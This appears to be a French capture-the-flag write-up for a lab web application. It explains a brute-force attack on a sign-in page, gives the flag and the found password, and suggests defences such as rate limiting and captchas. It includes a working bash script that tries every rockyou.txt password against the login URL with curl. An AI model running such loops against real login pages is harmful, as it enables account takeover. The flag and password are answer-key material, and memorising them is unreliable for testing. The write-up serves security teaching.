https://owasp.org/www-community/attacks/Brute_force_attack

**Flag : b3a6e43ddf8b4bbb4125e5e7d23040433827759d4de1c04ea63907479a80a6b2**

Comment se protéger : avoir un mot de passe avec une politique de sécurité sérieuse, se protéger contre le spam (captcha, check anti robot).

Comment on a trouvé : c’est connu alors on a cherché un moyen d’avoir une liste de mots de passes fréquemment utilisés. Le serveur n'impose pas de limites de requêtes. 

URL : /index.php?page=signin

Ce qu’on veut faire : trouver un moyen de s’authentifier

Solution : bruteforce

- Etape 1 : trouver un login pour pouvoir sign in  —> voir dans les cookies, on trouve I_am_admin (mais au final y’a pas de login)
- Etape 2 : récupérer le fichier rockyou.txt avec tous les mots de passes à tester
- Etape 3 : lancer le script bash suivant

```bash
#!/bin/bash

ip_address="192.168.1.70"

password_file="rockyou.txt"

while read password

do
    echo "Test du mot de passe : $password"

	result=$(curl -s "http://$ip_address/index.php?page=signin&username=I_am_admin&password=$password&Login=Login")

    if echo "$result" | grep -q "flag"; then
        echo "Mot de passe trouvé : $password"
        echo "$result"
        exit 0
    fi

done < "$password_file"

echo "Aucun mot de passe valide trouvé dans la liste."
```

- Etape 4 se loguer (sans login, mot de passe = shadow)
